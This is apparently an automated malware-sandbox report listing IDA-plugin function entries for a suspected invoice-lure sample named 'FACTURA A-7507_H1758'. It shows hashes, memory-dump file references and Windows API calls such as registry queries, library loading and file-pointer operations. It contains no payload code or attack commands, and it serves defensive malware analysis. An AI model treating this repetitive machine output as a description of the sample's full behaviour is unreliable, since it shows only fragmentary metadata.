                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                                                                                                                                                                                          • Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                                                                                                                                                                          • Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                                                                                                                                                                          • Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                                                                                                                                                                          • Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                                                                                                                                                                          • Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403203
                                                                                                                                                                                                                            • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(000028FF,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1092082344-0
                                                                                                                                                                                                                          • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                                                                                                                                                                          • Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FFF
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                                                                                                          • Opcode ID: 79d244419917b53f8b8e7d7fd01716a45f44c9095c55171dbfe81c5390bf0053
                                                                                                                                                                                                                          • Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79d244419917b53f8b8e7d7fd01716a45f44c9095c55171dbfe81c5390bf0053
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                                                                                                          • Opcode ID: a5df9d8d733f30683339ed07329149fba663b2d2223553b705b32a194bbac639
                                                                                                                                                                                                                          • Instruction ID: 7cdfc3cbb2e69f4264c6c6693aec6085e55c642d7687a467de19211c04d07d9e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5df9d8d733f30683339ed07329149fba663b2d2223553b705b32a194bbac639
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67219672A00100EBDB20EB94CD85D5E77B6AF84314B21453BF502F72E1DA7898618F5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000012E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                                                                                                          • Opcode ID: 7e3dc66a0c4e4db4557e30390ba759ccf808f2377b82121fb7e316e2894b98b5
                                                                                                                                                                                                                          • Instruction ID: c7ec42ec2a5b8cbcf97019b844e04a4f9c539befeef3331d530b96059407f5ff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3dc66a0c4e4db4557e30390ba759ccf808f2377b82121fb7e316e2894b98b5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF03171A14204EBEB209F65DE8CABF767DEF80354B10843FF505B61D0DAB84D419B69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumErrorLastWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 14984897-0
                                                                                                                                                                                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                                                                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                                                                                                                                                                          • Instruction ID: 040f2acbe5348ef8c996952313d322865bd2faa87b76d8d9ba7109e69b0e4b3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22316B30200219EBDB108F55ED84ADA3F68EB08359F20813AF905EA1D0DB79DF50DBA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000012E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                          • Opcode ID: fc0d1c261dc6cec8aab40022b61e73a429ebd427b24909dc8865f45a7e4b999a
                                                                                                                                                                                                                          • Instruction ID: a4ed2935f8c713a64b441f8b02302a8faa8aa65f3841d01997d269d515fb9b23
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc0d1c261dc6cec8aab40022b61e73a429ebd427b24909dc8865f45a7e4b999a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D119131911205EBDB10CFA0CA489AEB7B4EF44354B20843FE446B72D0D6B85A41DB19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
